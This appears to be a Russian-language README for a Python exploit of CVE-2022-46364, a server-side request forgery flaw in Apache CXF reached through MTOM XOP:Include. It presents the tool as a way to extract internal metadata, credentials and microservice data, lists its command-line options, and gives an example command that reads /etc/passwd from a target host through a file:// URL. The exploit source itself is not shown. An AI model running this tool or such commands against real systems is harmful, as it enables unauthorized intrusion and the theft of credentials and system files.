
Python-эксплойт для CVE-2022-46364 (SSRF в Apache CXF через MTOM XOP:Include). Отправляет подделанные SOAP-запросы для извлечения внутренних метаданных, учетных данных и данных микросервисов из уязвимых конечных точек.
Apache CXF SSRF через MTOM XOP:Include | CVSS 9.8 КРИТИЧЕСКИЙ
Apache CXF < 3.5.5 / < 3.4.10 позволяет выполнить Server-Side Request Forgery через непроверенные атрибуты href в элементах XOP:Include в MTOM-кодированных SOAP-запросах.
python3 exploit.py -t <TARGET_URL> -s <SSRF_URL> -d <DOMAIN>
-t, --target - Уязвимый SOAP-эндпоинт CXF (обязательно)-s, --ssrf-url - Внутренний URL для эксфильтрации (обязательно)-d, --domain - Целевой домен (по умолчанию: localhost)--plain-soap - Использовать обычный SOAP вместо MTOM# Read /etc/passwd
python3 exploit.py -t http://target.com:8080/employeeservice -s file:///etc/passwd -d target.com